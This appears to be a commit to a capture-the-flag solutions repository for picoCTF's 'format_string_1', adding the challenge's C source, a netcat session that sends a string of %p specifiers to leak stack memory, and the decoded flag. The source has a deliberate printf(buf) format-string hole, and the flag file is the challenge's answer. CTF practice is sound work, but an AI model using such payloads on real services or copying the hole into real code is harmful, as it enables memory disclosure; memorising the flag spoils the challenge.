pwn/format_string_1

pwn/format_string_1/flag.txt

@@ -0,0 +1,5 @@
+# By cutting off a part of the output and giving it to cyberchef (as well as swapping endianness with word length 8), we get:
+
+0x7b4654436f636970.0x355f31346d316e34.0x3478345f33317937.0x35365f673431665f.0x7d313464303935
+
+-> picoCTF{4n1m41_57y13_4x4_f14g_65590d41}

pwn/format_string_1/format-string-1.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+
+
+int main() {
+  char buf[1024];
+  char secret1[64];
+  char flag[64];
+  char secret2[64];
+
+  // Read in first secret menu item
+  FILE *fd = fopen("secret-menu-item-1.txt", "r");
+  if (fd == NULL){
+    printf("'secret-menu-item-1.txt' file not found, aborting.\n");
+    return 1;
+  }
+  fgets(secret1, 64, fd);
+  // Read in the flag
+  fd = fopen("flag.txt", "r");
+  if (fd == NULL){
+    printf("'flag.txt' file not found, aborting.\n");
+    return 1;
+  }
+  fgets(flag, 64, fd);
+  // Read in second secret menu item
+  fd = fopen("secret-menu-item-2.txt", "r");
+  if (fd == NULL){
+    printf("'secret-menu-item-2.txt' file not found, aborting.\n");
+    return 1;
+  }
+  fgets(secret2, 64, fd);
+
+  printf("Give me your order and I'll read it back to you:\n");
+  fflush(stdout);
+  scanf("%1024s", buf);
+  printf("Here's your order: ");
+  printf(buf);
+  printf("\n");
+  fflush(stdout);
+
+  printf("Bye!\n");
+  fflush(stdout);
+
+  return 0;
+}

pwn/format_string_1/output.txt

@@ -0,0 +1,4 @@
+$ nc mimas.picoctf.net 57678 <<<"%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p"
+Give me your order and I'll read it back to you:
+Here's your order: 0x402118.(nil).0x7fbbf8d1fa00.(nil).0x89b880.0xa347834.0x7ffd876bd5a0.0x7fbbf8b10e60.0x7fbbf8d354d0.0x1.0x7ffd876bd670.(nil).(nil).0x7b4654436f636970.0x355f31346d316e34.0x3478345f33317937.0x35365f673431665f.0x7d313464303935
+Bye!